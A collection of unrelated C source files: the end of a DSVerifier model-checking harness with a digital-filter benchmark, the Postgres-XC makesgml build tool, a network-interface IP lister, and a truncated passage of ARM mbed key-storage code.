__DSVERIFIER_assert_msg(res[i] >= filter.Ap, "|----------------Passband Failure-------------|");
}
}
} else {
__DSVERIFIER_assert(0);
}
return 0;
}
# 48 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
extern digital_system ds;
extern digital_system plant;
digital_system plant_cbmc;
extern digital_system controller;
extern implementation impl;
extern hardware hw;
extern digital_system_state_space _controller;
extern filter_parameters filter;
unsigned int nondet_uint();
extern void initials();
void validation();
void call_verification_task(void * verification_task);
void call_closedloop_verification_task(void * closedloop_verification_task);
float nondet_float();
double nondet_double();
int main(){
initialization();
validation();
if (1 == 0)
rounding_mode = 0;
else if (1 == 1)
rounding_mode = 1;
else if (1 == 2)
rounding_mode = 2;
if (3 == 3)
{
call_verification_task(&verify_overflow);
}
else if (3 == 2)
{
call_verification_task(&verify_limit_cycle);
}
else if (3 == 6)
{
call_verification_task(&verify_error);
}
else if (3 == 1)
{
call_verification_task(&verify_zero_input_limit_cycle);
}
else if (3 == 4)
{
call_verification_task(&verify_timing_msp_430);
}
else if (3 == 5)
{
call_verification_task(&verify_generic_timing);
}
else if (3 == 7)
{
call_verification_task(&verify_stability);
}
else if (3 == 8)
{
call_verification_task(&verify_minimum_phase);
}
else if (3 == 9)
{
call_closedloop_verification_task(&verify_stability_closedloop_using_dslib);
}
else if (3 == 10)
{
call_closedloop_verification_task(&verify_limit_cycle_closed_loop);
}
else if (3 == 11)
{
call_closedloop_verification_task(&verify_error_closedloop);
}
else if (3 == 12)
{
verify_error_state_space();
}
else if (3 == 16)
{
verify_safety_state_space();
}
else if (3 == 13)
{
verify_controllability();
}
else if (3 == 14)
{
verify_observability();
}
else if (3 == 15)
{
verify_limit_cycle_state_space();
}
else if (3 == 18)
{
call_verification_task(&verify_magnitude);
}
return 0;
}
void validation()
{
if (3 == 12 || 3 == 16 ||
3 == 15 || 3 == 13 ||
3 == 14)
{
if (0 == 0)
{
printf("\n\n********************************************************************************************\n");
printf("* set a K_SIZE to use this property in DSVerifier (use: -DK_SIZE=VALUE) *\n");
printf("********************************************************************************************\n");
__DSVERIFIER_assert(0);
exit(1);
}
initials();
return;
}
if (((3 != 9) && (3 != 10) &&
(3 != 11)) && (ds.a_size == 0 || ds.b_size == 0))
{
printf("\n\n****************************************************************************\n");
printf("* set (ds and impl) parameters to check with DSVerifier *\n");
printf("****************************************************************************\n");
__DSVERIFIER_assert(0);
}
if ((3 == 9) || (3 == 10) ||
(3 == 11))
{
if (controller.a_size == 0 || plant.b_size == 0 || impl.int_bits == 0 )
{
printf("\n\n*****************************************************************************************************\n");
printf("* set (controller, plant, and impl) parameters to check CLOSED LOOP with DSVerifier *\n");
printf("*****************************************************************************************************\n");
__DSVERIFIER_assert(0);
}
else
{
printf("\n\n*****************************************************************************************************\n");
printf("* set (controller and impl) parameters so that they do not overflow *\n");
printf("*****************************************************************************************************\n");
unsigned j;
for (j = 0; j < controller.a_size; ++j)
{
const double value=controller.a[j];
__DSVERIFIER_assert(value <= _dbl_max);
__DSVERIFIER_assert(value >= _dbl_min);
}
for (j = 0; j < controller.b_size; ++j)
{
const double value=controller.b[j];
__DSVERIFIER_assert(value <= _dbl_max);
__DSVERIFIER_assert(value >= _dbl_min);
}
}
if (controller.b_size > 0)
{
unsigned j, zeros=0;
for (j = 0; j < controller.b_size; ++j)
{
if (controller.b[j]==0)
++zeros;
}
if (zeros == controller.b_size)
{
printf("\n\n*****************************************************************************************************\n");
printf("* The controller numerator must not be zero *\n");
printf("*****************************************************************************************************\n");
__DSVERIFIER_assert(0);
}
}
if (controller.a_size > 0)
{
unsigned j, zeros=0;
for (j = 0; j < controller.a_size; ++j)
{
if (controller.a[j]==0)
++zeros;
}
if (zeros == controller.a_size)
{
printf("\n\n*****************************************************************************************************\n");
printf("* The controller denominator must not be zero *\n");
printf("*****************************************************************************************************\n");
__DSVERIFIER_assert(0);
}
}
if (0 == 0)
{
printf("\n\n***************************************************************************************************************\n");
printf("* set a connection mode to check CLOSED LOOP with DSVerifier (use: --connection-mode TYPE) *\n");
printf("***************************************************************************************************************\n");
__DSVERIFIER_assert(0);
}
}
if (3 == 0)
{
printf("\n\n***************************************************************************************\n");
printf("* set the property to check with DSVerifier (use: --property NAME) *\n");
printf("***************************************************************************************\n");
__DSVERIFIER_assert(0);
}
if ((3 == 3) || (3 == 2) || (3 == 1) ||
(3 == 10) || (3 == 11) ||
(3 == 4 || 3 == 5) || 3 == 6)
{
if ((5 == 0) && !(0 == 1))
{
printf("\n\n********************************************************************************************\n");
printf("* set a X_SIZE to use this property in DSVerifier (use: --x-size VALUE) *\n");
printf("********************************************************************************************\n");
__DSVERIFIER_assert(0);
}
else if (0 == 1)
{
X_SIZE_VALUE = nondet_uint();
__DSVERIFIER_assume( X_SIZE_VALUE > (2 * ds.a_size));
}
else if (5 < 0)
{
printf("\n\n********************************************************************************************\n");
printf("* set a X_SIZE > 0 *\n");
printf("********************************************************************************************\n");
__DSVERIFIER_assert(0);
}
else
{
X_SIZE_VALUE = 5;
}
}
if ((1 == 0) && (3 != 9) && (3 != 18))
{
printf("\n\n*********************************************************************************************\n");
printf("* set the realization to check with DSVerifier (use: --realization NAME) *\n");
printf("*********************************************************************************************\n");
__DSVERIFIER_assert(0);
}
if (3 == 6 || 3 == 11)
{
if (impl.max_error == 0)
{
printf("\n\n***********************************************************************\n");
printf("* provide the maximum expected error (use: impl.max_error) *\n");
printf("***********************************************************************\n");
__DSVERIFIER_assert(0);
}
}
if (3 == 4 || 3 == 5)
{
if (3 == 5 || 3 == 4)
{
if (hw.clock == 0l)
{
printf("\n\n***************************\n");
printf("* Clock could not be zero *\n");
printf("***************************\n");
__DSVERIFIER_assert(0);
}
hw.cycle = ((double) 1.0 / hw.clock);
if (hw.cycle < 0)
{
printf("\n\n*********************************************\n");
printf("* The cycle time could not be representable *\n");
printf("*********************************************\n");
__DSVERIFIER_assert(0);
}
if (ds.sample_time == 0)
{
printf("\n\n*****************************************************************************\n");
printf("* provide the sample time of the digital system (ds.sample_time) *\n");
printf("*****************************************************************************\n");
__DSVERIFIER_assert(0);
}
}
}
if (3 == 18)
{
if (!((filter.Ap > 0) && (filter.Ac >0) && (filter.Ar >0)))
{
printf("\n\n*****************************************************************************\n");
printf("* set values bigger than 0 for Ap, Ac and Ar* \n");
printf("*****************************************************************************\n");
__DSVERIFIER_assert(0);
}
}
if ((1 == 7) || (1 == 8) || (1 == 9) ||
(1 == 10) || (1 == 11) || (1 == 12))
{
printf("\n\n******************************************\n");
printf("* Temporarily the cascade modes are disabled *\n");
printf("**********************************************\n");
__DSVERIFIER_assert(0);
}
}
void call_verification_task(void * verification_task)
{
int i = 0;
_Bool base_case_executed = 0;
if (0 == 2)
{
for(i=0; i<ds.b_size; i++)
{
if (ds.b_uncertainty[i] > 0)
{
double factor = ds.b_uncertainty[i];
factor = factor < 0 ? factor * (-1) : factor;
double min = ds.b[i] - factor;
double max = ds.b[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
ds.b[i] = nondet_double();
__DSVERIFIER_assume((ds.b[i] >= min) && (ds.b[i] <= max));
}
}
for(i=0; i<ds.a_size; i++)
{
if (ds.a_uncertainty[i] > 0)
{
double factor = ds.a_uncertainty[i];
factor = factor < 0 ? factor * (-1) : factor;
double min = ds.a[i] - factor;
double max = ds.a[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
ds.a[i] = nondet_double();
__DSVERIFIER_assume((ds.a[i] >= min) && (ds.a[i] <= max));
}
}
}
else
{
int i=0;
for(i=0; i<ds.b_size; i++)
{
if (ds.b_uncertainty[i] > 0)
{
double factor = ((ds.b[i] * ds.b_uncertainty[i]) / 100);
factor = factor < 0 ? factor * (-1) : factor;
double min = ds.b[i] - factor;
double max = ds.b[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
ds.b[i] = nondet_double();
__DSVERIFIER_assume((ds.b[i] >= min) && (ds.b[i] <= max));
}
}
for(i=0; i<ds.a_size; i++)
{
if (ds.a_uncertainty[i] > 0)
{
double factor = ((ds.a[i] * ds.a_uncertainty[i]) / 100);
factor = factor < 0 ? factor * (-1) : factor;
double min = ds.a[i] - factor;
double max = ds.a[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
ds.a[i] = nondet_double();
__DSVERIFIER_assume((ds.a[i] >= min) && (ds.a[i] <= max));
}
}
}
((void(*)())verification_task)();
}
void call_closedloop_verification_task(void * closedloop_verification_task)
{
_Bool base_case_executed = 0;
int i=0;
for(i=0; i<plant.b_size; i++)
{
if (plant.b_uncertainty[i] > 0)
{
double factor = ((plant.b[i] * plant.b_uncertainty[i]) / 100);
factor = factor < 0 ? factor * (-1) : factor;
double min = plant.b[i] - factor;
double max = plant.b[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
plant.b[i] = nondet_double();
__DSVERIFIER_assume((plant.b[i] >= min) && (plant.b[i] <= max));
}else{
}
}
for(i=0; i<plant.a_size; i++)
{
if (plant.a_uncertainty[i] > 0)
{
double factor = ((plant.a[i] * plant.a_uncertainty[i]) / 100);
factor = factor < 0 ? factor * (-1) : factor;
double min = plant.a[i] - factor;
double max = plant.a[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
plant.a[i] = nondet_double();
__DSVERIFIER_assume((plant.a[i] >= min) && (plant.a[i] <= max));
}
else
{
}
}
((void(*)())closedloop_verification_task)();
}
# 2 "benchmarks/ds-06-impl3.c" 2
digital_system ds = {
.b = { 0.93, -0.87 },
.b_size = 2,
.a = { 1.0, 1.0 },
.a_size = 2,
.sample_time = 0.02
};
implementation impl = {
.int_bits = 10,
.frac_bits = 6,
.max = 1.0,
.min = -1.0
};
|
the_stack_data/101506.c | /*----------------------------------------------------------------------------
*
* makesgml - Postgres-XC document build tool
*
* Copyright (c) 2010-2012, Postgres-XC Development Group
*
* IDENTIFICATION
* src/pgxc/tools/makesgml/makesgml.c
*
* This tools converts .sgmlin files into .sgml files to be handled by
* many tools to generate Postgres-XC documants.
*
* To mark the difference between PostgreSQL and Postgres-XC, .sgmlin
* uses dedicated tabs <!## name> and <!## end>, where name is PG or XC
* which indicates specific information for PostgreSQL and Postgres-XC
* respectively. This mechanism is introduced to make it easier
* to merge PostgreSQL upgrades.
*
* In fact, name can be arbitrary identifier other than "end". For example,
* this can be <!## JP> or <!## EN> to indicate the language is Japanese or
* English.
*
* This tool accepts the following arguments:
*
* -i infilename: specifies input file name. - means standard input. If not
* specified, standard input will be used.
* -o outfilename: specifies output file name. - means standard output. If
* not specified, standard output will be used.
* -I name: specify the name tag which will be included in the output.
* You can specifiy this parameter as many times as needed.
* -E name: specify the name tag which will be excluded in the output.
* You may specify this parameter as many times as needed.
* -d opt: Specify the default handling of the tags which does not appear
* in -I or -E option. opt can be i (include) or e (exluce).
* Default is e.
*
* To keep error massages in the following stage easy to track by the line
* number, excluded line will be replaced with brank line.
*
*---------------------------------------------------------------------------
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
typedef struct tokenlist
{
struct tokenlist *next;
char *token;
} tokenlist;
static int find_match(char *token, tokenlist *toks);
static int find_match_exclude(char *token);
static int find_match_include(char *token);
static void usage(int exitcode);
#define STARTTOKEN "<!##"
tokenlist *ignoreToks = NULL;
tokenlist *lastIgnoreToken = NULL;
tokenlist *includeToks = NULL;
tokenlist *lastIncludeToken = NULL;
FILE *inf;
FILE *outf;
int inf_lno;
char *progname;
int default_include = 0;
void make_sgml(int writeflag);
void usage(int exitcode);
void format_err(int lno);
int my_getline(char *buf);
int main(int argc, char *argv[])
{
int opt;
char *ifnam = NULL;
char *ofnam = NULL;
char *token;
inf = stdin;
outf = stdout;
progname = argv[0];
while ((opt = getopt(argc, argv, "i:o:E:I:d:")) != -1)
{
switch(opt)
{
case 'i':
if (ifnam)
{
free(ifnam);
ifnam = NULL;
}
if ((strcmp(optarg, "-") == 0) || (strcmp(optarg, "stdin") == 0))
inf = stdin;
else
ifnam = strndup(optarg, strlen(optarg));
break;
case 'o':
if (ofnam)
{
free(ofnam);
ofnam = NULL;
}
if ((strcmp(optarg, "-") == 0) || (strcmp(optarg, "stdout") == 0))
outf = stdout;
else
ofnam = strndup(optarg, strlen(optarg));
break;
case 'E':
token = strndup(optarg,strlen(optarg));
if (ignoreToks == NULL)
{
ignoreToks = (tokenlist *)malloc(sizeof(tokenlist));
if (ignoreToks == NULL)
goto memerr;
ignoreToks->token = token;
ignoreToks->next = NULL;
lastIgnoreToken = ignoreToks;
}
else
{
lastIgnoreToken->next = (tokenlist *)malloc(sizeof(tokenlist));
if (lastIgnoreToken->next == NULL)
goto memerr;
lastIgnoreToken = lastIgnoreToken->next;
lastIgnoreToken->next = NULL;
lastIgnoreToken->token = token;
}
break;
case 'I':
token = strndup(optarg, strlen(optarg));
if (includeToks == NULL)
{
includeToks = (tokenlist *)malloc(sizeof(tokenlist));
if (includeToks == NULL)
goto memerr;
includeToks->token = token;
includeToks->next = NULL;
lastIncludeToken = includeToks;
}
else
{
lastIncludeToken->next = (tokenlist *)malloc(sizeof(tokenlist));
if (lastIncludeToken->next == NULL)
goto memerr;
lastIncludeToken = lastIncludeToken->next;
lastIncludeToken->next = NULL;
lastIncludeToken->token = token;
}
break;
case 'd': /* Default handling: include/exclude */
if (strcmp(optarg, "i") == 0)
default_include = 1;
else if (strcmp(optarg, "e") == 0)
default_include = 0;
else
usage(1);
break;
default:
usage(1);
exit(1);
}
}
if (ifnam)
{
inf = fopen(ifnam, "r");
if (inf == NULL)
{
fprintf(stderr, "Cannot open input file %s, %s\n", ifnam, strerror(errno));
exit(1);
}
}
inf_lno = 0;
if (ofnam)
{
outf = fopen(ofnam, "w");
if (outf == NULL)
{
fprintf(stderr, "Cannot open output file %s, %s\n", ofnam, strerror(errno));
exit(1);
}
}
make_sgml(1);
exit(0);
memerr:
fprintf(stderr, "Memory not available.\n");
exit(1);
}
int my_getline(char *buf)
{
int c;
c = getc(inf);
if (c == EOF)
{
*buf = 0;
return EOF;
}
else
{
ungetc(c, inf);
}
for (;;)
{
c = getc(inf);
switch(c)
{
case '\n':
*buf++ = c;
*buf = 0;
inf_lno++;
return 1;
case EOF:
*buf = 0;
inf_lno++;
return 1;
default:
*buf++ = c;
continue;
}
}
exit(1);
}
static int find_match(char *token, tokenlist *toks)
{
tokenlist *currToks;
for (currToks = toks; currToks; currToks = currToks->next)
{
if (strcmp(token, currToks->token) == 0)
return 1;
}
return 0;
}
static int find_match_exclude(char *token)
{
return find_match(token, ignoreToks);
}
static int find_match_include(char *token)
{
return find_match(token, includeToks);
}
void format_err(int lno)
{
fprintf(stderr, "Input file format error. Line %d.\n", lno);
exit(1);
}
void make_sgml(int writeflag)
{
int rv;
char inputline[4096];
for (;;)
{
char *curr;
char *token;
rv = my_getline(inputline);
if (rv == EOF)
return;
curr = inputline;
for (;;curr++)
{
if (*curr == ' ' || *curr == '\t')
continue;
else
break;
}
if (memcmp(curr, STARTTOKEN, strlen(STARTTOKEN)) == 0)
{
curr += strlen(STARTTOKEN);
if (*curr != ' ' && *curr != '\t')
format_err(inf_lno);
for (curr++;;curr++)
{
if (*curr == '\n' || *curr == 0)
format_err(inf_lno);
if (*curr == ' ' || *curr == '\t')
continue;
else
break;
}
token = curr;
for (;;curr++)
{
if (*curr == '\n' || *curr == 0)
format_err(inf_lno);
if (*curr == ' ' || *curr == '\t')
{
*curr = 0;
curr++;
break;
}
else if (*curr == '>')
{
*curr = 0;
curr++;
*curr = '>';
break;
}
else
{
continue;
}
}
for (;;curr++)
{
if (*curr == '\n' || *curr == 0)
format_err(inf_lno);
if (*curr == ' ' || *curr == '\t')
continue;
else if (*curr == '>')
break;
else
format_err(inf_lno);
}
/* You can write anything after clsing '>' */
fputc('\n', outf);
if (strcmp(token, "end") == 0)
return;
if (find_match_exclude(token))
{
make_sgml(0);
}
else if (find_match_include(token))
{
if (writeflag)
make_sgml(1);
else
make_sgml(0);
}
else {
make_sgml(0);
}
}
else
{
if (writeflag)
fputs(inputline, outf);
else
fputc('\n', outf);
}
}
exit(1);
}
static void usage(int exitcode)
{
fprintf(stderr,
"%s -i infile -o outfile [-d i|e ] -D exclude_token -D ... -U include_token -U ...\n",
progname);
exit(exitcode);
}
|
the_stack_data/32951577.c | void cfun() {}
|
the_stack_data/30535.c | #include <sys/types.h>
#include <arpa/inet.h>
#include <ifaddrs.h>
#include <libgen.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
typedef struct IPA {
char ip[16];
char name[32];
} IPA;
typedef struct Args {
short showColor;
short hideName;
short maxCount;
char *ipFormat;
char *nameFormat;
} Args;
char *mkLowerCase(char *mixed) {
char *s = mixed;
for (; *s; ++s) *s = tolower(*s);
return mixed;
}
short idxOf(char *substring, char *string) {
char *result = strstr(string, substring);
return result ? result - string : -1;
}
short idxOfL(char *substring, char *string) {
char *sub = strdup(substring), *str = strdup(string), res = 0;
mkLowerCase(sub);mkLowerCase(str); res = idxOf(sub,str);
free(sub); free(str); return (short)res;
}
int main(int argc, char **argv) {
struct ifaddrs *tmp, *addrs;
char *s, format[255];
char ipWColor[] = "\x1b[0m%s\x1b[0;34m%s";
char ipWOColor[] = "%s%s";
char nameWColor[] = "\x1b[1;37m:\x1b[0;33m%s\x1b[0m";
char nameWOColor[] = ":%s";
int first = 1, i, shown = 0, ipCount = 0;
IPA ips[10];
Args args;
memset(&args, 0L, sizeof(Args));
args.maxCount = 10;
args.showColor = 1;
args.hideName = 0;
getifaddrs(&addrs);
tmp = addrs;
if (argc > 1 && (~idxOfL("?", argv[1]) || ~idxOfL("help", argv[1]))) {
printf("Usage: %s <args.maxCount> [--no-color] [--hide-name]\n", basename(argv[0]));
return 0;
}
for (i=1;i<argc;i++)
if (~idxOfL("--hide-name",argv[i])) { args.hideName = 1; break;}
for (i=1;i<argc;i++)
if (~idxOfL("--no-color",argv[i])) { args.showColor = 0; break; }
for (i=1;i<argc;i++)
if (!(args.maxCount = atoi(argv[i]))) { args.maxCount = 10; }
i = 0;
while(tmp) {
if (tmp->ifa_addr && tmp->ifa_addr->sa_family == AF_INET) {
struct sockaddr_in *pAddr = (struct sockaddr_in *)tmp->ifa_addr;
sprintf(ips[i].ip, "%s", inet_ntoa(pAddr->sin_addr));
sprintf(ips[i].name, "%s", tmp->ifa_name);
/* convert name tolower */
s = ips[i].name; for (; *s; ++s) *s = tolower(*s); s = ips[i].name;
ipCount++;
i++;
}
tmp = tmp->ifa_next;
}
strcpy(format, args.showColor ? ipWColor : ipWOColor);
if (!args.hideName) {
strcat(format, args.showColor ? nameWColor : nameWOColor);
}
for (i = 0, first = 1; i < ipCount; i++) {
if (!~idxOfL("lo", ips[i].name)) {
printf(
format,
first ? "" : ",",
ips[i].ip,
args.hideName ? "" : ips[i].name
);
first = 0;
shown++;
if (shown >= args.maxCount) break;
}
}
printf("\n");
freeifaddrs(addrs);
}
|
the_stack_data/215768980.c | // ----------------------------------------------------------------------------
// Copyright 2016-2017 ARM Ltd.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// ----------------------------------------------------------------------------
#ifdef MBED_CONF_MBED_CLOUD_CLIENT_PSA_SUPPORT
#include <stdbool.h>
#include "key_slot_allocator.h"
#include "pv_error_handling.h"
#include "storage_internal.h"
#include "pv_macros.h"
#ifdef TARGET_LIKE_MBED
#include "psa/lifecycle.h"
#endif
#include "psa/crypto_types.h"
#include "psa/crypto.h"
#include "fcc_malloc.h"
#include "storage_se_atmel.h"
extern bool g_kcm_initialized;
#define STORAGE_PSA_WRITE_ONCE_BIT (0x1 << 0)
#define STORAGE_PSA_CONFIDENTIALITY_BIT (0x1 << 1)
#define STORAGE_PSA_REPLAY_PROTECTION_BIT (0x1 << 2)
static kcm_status_e storage_set_medatata_value(uint32_t item_type, storage_item_prefix_type_e item_prefix_type, kcm_chain_cert_info_s* cert_name_info, uint8_t* metadata)
{
int metadata_val = 0;
SA_PV_ERR_RECOVERABLE_RETURN_IF((item_prefix_type != STORAGE_ITEM_PREFIX_KCM && item_prefix_type != STORAGE_ITEM_PREFIX_CE), KCM_STATUS_INVALID_PARAMETER, "Invalid item_source_type");
SA_PV_ERR_RECOVERABLE_RETURN_IF((STORAGE_ITEM_METADATA_SIZE > sizeof(int)), KCM_STATUS_INVALID_PARAMETER, "metadata size is too big");
if (cert_name_info == NULL) { //all items except certificate chains
switch (item_type) {
//do nothing in following cases
case KCM_PRIVATE_KEY_ITEM: /* private key metadata val is 0, so no need to set it */
case KCM_CONFIG_ITEM:
case STORAGE_RBP_ITEM:
break;
case KCM_PUBLIC_KEY_ITEM:
STORAGE_SET_KEY_METADATA_VAL(metadata_val, STORAGE_METADATA_PUBLIC_KEY_VAL);
break;
case KCM_SYMMETRIC_KEY_ITEM:
STORAGE_SET_KEY_METADATA_VAL(metadata_val, STORAGE_METADATA_SYMMETRIC_KEY_VAL);
break;
case KCM_CERTIFICATE_ITEM:
STORAGE_SET_CERTIFICATE_CHAIN_INDEX_METADATA_VAL(metadata_val, STORAGE_METADATA_SINGLE_CERTIFICATE_VAL);
STORAGE_SET_CERTIFICATE_CHAIN_LAST_VAL(metadata_val, STORAGE_METADATA_CERTIIFCATE_CHAIN_LAST_VAL);
break;
default: //invalid item
SA_PV_LOG_ERR("Invalid item type");
return KCM_STATUS_INVALID_PARAMETER;
}
} else { //cert_name_info != NULL - certificate chains
//increment the index of each certificate in chain
STORAGE_SET_CERTIFICATE_CHAIN_INDEX_METADATA_VAL(metadata_val, (int)(cert_name_info->certificate_index + 1));
if (cert_name_info->is_last_certificate == true) {
//set last value bit if this is the last certificate
STORAGE_SET_CERTIFICATE_CHAIN_LAST_VAL(metadata_val, STORAGE_METADATA_CERTIIFCATE_CHAIN_LAST_VAL);
}
}
//set duplicate item value if CE item
if (item_prefix_type == STORAGE_ITEM_PREFIX_CE) {
STORAGE_SET_DUPLICATE_ITEM_METADATA_VAL(metadata_val, STORAGE_METADATA_DUPLICATE_ITEM_VAL);
}
memcpy(metadata, &metadata_val, STORAGE_ITEM_METADATA_SIZE);
return KCM_STATUS_SUCCESS;
}
static kcm_status_e storage_build_key_pair_item_names(
const uint8_t *private_key_name,
size_t private_key_name_len,
const uint8_t *public_key_name,
size_t public_key_name_len,
uint8_t *storage_private_key_name,
uint8_t *storage_public_key_name,
storage_item_prefix_type_e item_prefix_type)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
//Create complete data names
kcm_status = storage_build_item_name(private_key_name,
private_key_name_len,
KCM_PRIVATE_KEY_ITEM,
item_prefix_type,
NULL,
storage_private_key_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to to build complete name");
if (public_key_name != NULL) {
kcm_status = storage_build_item_name(public_key_name,
public_key_name_len,
KCM_PUBLIC_KEY_ITEM,
item_prefix_type,
NULL,
storage_public_key_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to to build complete name");
}
return kcm_status;
}
static kcm_status_e check_existance_first_cert_in_chain(storage_item_prefix_type_e item_prefix_type,
const uint8_t *kcm_item_name,
size_t kcm_item_name_len,
uint8_t *storage_name,
size_t *item_data_act_size)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
kcm_chain_cert_info_s cert_chain_info = { 0, false };
//Change complete certificate name to first certificate in chain with the same name
kcm_status = storage_build_item_name(kcm_item_name, kcm_item_name_len, KCM_CERTIFICATE_ITEM, item_prefix_type, &cert_chain_info, storage_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to change single certificate name");
//Fetch size
kcm_status = ksa_item_get_data_size((const uint8_t *)storage_name, KCM_CERTIFICATE_ITEM, item_data_act_size);
SA_PV_TRACE_RECOVERABLE_RETURN_IF(kcm_status == KCM_STATUS_ITEM_NOT_FOUND, KCM_STATUS_ITEM_NOT_FOUND, "Fist cert in chain was not found");
SA_PV_ERR_RECOVERABLE_RETURN_IF(kcm_status != KCM_STATUS_SUCCESS, kcm_status = kcm_status, "Failed to check existence");
SA_PV_LOG_WARN("Warning: The operation made on first certificate of the chain using single certificate API!");
return kcm_status;
}
#ifdef MBED_CONF_MBED_CLOUD_CLIENT_SECURE_ELEMENT_SUPPORT
static void set_item_location(const kcm_security_desc_s kcm_item_info, kcm_item_extra_info_s *item_extra_info_out)
{
kcm_item_extra_info_s *item_extra_info = (kcm_item_extra_info_s *)kcm_item_info;
if (item_extra_info != NULL) {
// set the location as given by the caller
item_extra_info_out->priv_key_location = item_extra_info->priv_key_location;
item_extra_info_out->pub_key_location = item_extra_info->pub_key_location;
}
// if the user pass NULL for 'kcm_item_info' the default will be used as set by kcm_item_policy_init()
}
static kcm_status_e check_item_location(kcm_item_location_e item_location)
{
switch (item_location) {
case KCM_LOCATION_PSA:
case KCM_LOCATION_SECURE_ELEMENT:
return KCM_STATUS_SUCCESS;
default:
return KCM_STATUS_INVALID_PARAMETER;
}
}
#endif
kcm_status_e storage_build_item_name(const uint8_t *kcm_item_name,
size_t kcm_item_name_len,
uint32_t item_type,
storage_item_prefix_type_e item_prefix_type,
kcm_chain_cert_info_s* cert_name_info,
uint8_t* storage_item_name_out)
{
palStatus_t pal_status;
kcm_status_e kcm_status;
uint8_t storage_name[STORAGE_ITEM_NAME_HASH_SIZE];
uint8_t storage_metadata[STORAGE_ITEM_METADATA_SIZE] = { 0 };
// Check name validation. This is done only in this function since all KCM APIs using file names go
// through here.
kcm_status = storage_check_name_validity(kcm_item_name, kcm_item_name_len);
SA_PV_ERR_RECOVERABLE_RETURN_IF(kcm_status != KCM_STATUS_SUCCESS, kcm_status, "Invalid KCM name");
//set storage name by calculating sha256 of item_name
pal_status = pal_sha256(kcm_item_name, kcm_item_name_len, storage_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF(pal_status != PAL_SUCCESS, KCM_STATUS_ERROR, "Failed to calculate hash");
//set metadata
kcm_status = storage_set_medatata_value(item_type, item_prefix_type, cert_name_info, storage_metadata);
SA_PV_ERR_RECOVERABLE_RETURN_IF(kcm_status != KCM_STATUS_SUCCESS, kcm_status, "Failed to build name");
//copy the values to output name
memcpy(storage_item_name_out, storage_name, STORAGE_ITEM_NAME_HASH_SIZE);
memcpy(storage_item_name_out + STORAGE_ITEM_NAME_HASH_SIZE, storage_metadata, STORAGE_ITEM_METADATA_SIZE);
return KCM_STATUS_SUCCESS;
}
kcm_status_e storage_check_certificate_existance(const uint8_t *kcm_chain_name, size_t kcm_chain_name_len, storage_item_prefix_type_e item_prefix_type)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
kcm_chain_cert_info_s cert_name_info = { 0, false };
uint8_t storage_item_name[STORAGE_COMPLETE_ITEM_NAME_SIZE];
//Build complete name of single certificate with given certificate chain name
kcm_status = storage_build_item_name(kcm_chain_name, kcm_chain_name_len, KCM_CERTIFICATE_ITEM, item_prefix_type, NULL, storage_item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build data name");
//If single certificate with the chain name is exists in the data base - return an error
kcm_status = ksa_item_check_existence((const uint8_t*)storage_item_name, KCM_CERTIFICATE_ITEM);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_ITEM_NOT_FOUND), kcm_status = KCM_STATUS_FILE_EXIST, "Data with the same name already exists");
//Build complete name of first certificate name in the chain
kcm_status = storage_build_item_name(kcm_chain_name, kcm_chain_name_len, KCM_CERTIFICATE_ITEM, item_prefix_type, &cert_name_info, storage_item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build data name");
kcm_status = ksa_item_check_existence((const uint8_t*)storage_item_name, KCM_CERTIFICATE_ITEM);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_ITEM_NOT_FOUND), kcm_status = KCM_STATUS_FILE_EXIST, "Data with the same name already exists");
return kcm_status;
}
kcm_status_e storage_set_certs_and_chain_size(storage_cert_chain_context_s *chain_context, storage_item_prefix_type_e item_prefix_type)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
uint8_t storage_item_name[STORAGE_COMPLETE_ITEM_NAME_SIZE];
size_t cert_size;
kcm_chain_cert_info_s cert_name_info = { 0, false };
int certificate_index = 0;
//Try to read all certificate in the chain, retrieve the number of certificates in the chain and their sizes
for (certificate_index = 0; (certificate_index < KCM_MAX_NUMBER_OF_CERTITICATES_IN_CHAIN) && (cert_name_info.is_last_certificate == false); certificate_index++) {
cert_name_info.certificate_index = (uint32_t)certificate_index;
//Build certificate name according to its index in certificate chain
